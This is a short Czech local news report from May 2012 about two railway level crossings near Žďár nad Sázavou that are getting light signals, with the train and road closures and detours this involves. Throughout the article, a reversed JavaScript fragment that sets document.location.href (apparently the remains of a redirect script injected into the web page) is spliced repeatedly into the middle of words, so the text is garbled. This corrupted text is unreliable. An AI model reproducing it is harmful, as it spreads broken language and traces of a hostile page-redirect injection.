Žďár nad Sázavou, zdar nad sazavou, aktuality, přejezdy
Rainbow page separator

U Žďáru přibudou dva světelně zabezpečené přejezdy

Pátek, 11. května 2012

prejezdŽďár nad Sázavou/ Lepší zabezpečení budou mít co nevidět dva železniční přejezdy v těsné blízkosti Žďáru nad Sázavou. Pracovat se již začalo na přejezdu u cha[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové oblasti Krejdy, který se nachází mezi okresním městem a obcí Jámy, a na místě za odbočkou z hlavní silnice na ves Mělkovice, místní část Žďáru nad Sázavou. Oba uvedené železniční přejezdy jsou v současné době osazeny pouze svislou dopravní značkou „S[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];top, dej přednost v jízdě“.

Ovšem po dokončení úprav budou riziková místa ještě le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos označena světelnou výstražnou signalizací. To by mělo výrazně zvýšit bezpečnost a riziko střetů vozidel s vlaky, které na jednokolejné trati mezi Žďárem nad Sázavou a Novým Městem na Moravě jezdí.

Kvůli pracím souvisejícím s přebudováním přejezdů bude omezena silniční i vlaková doprava. Na železniční trati mezi okresním městem a Tišnovem na Brněnsku výluka trvá od středy 9. května až do úterý 22. května 2012. Cestující jsou a budou přepravováni náhradní au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusovou dopravou. Od pondělí 14. května do soboty 19. května 2012 budou zase uzavřeny komunikace v místech přejezdů pro mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristy. Úplná uzavírka bude platit nejenom pro au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily, ale i pro au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusy. Vozidla budou muset jezdit objízdnou trasou. Ta povede přes vesnici Veselíčko. (zp)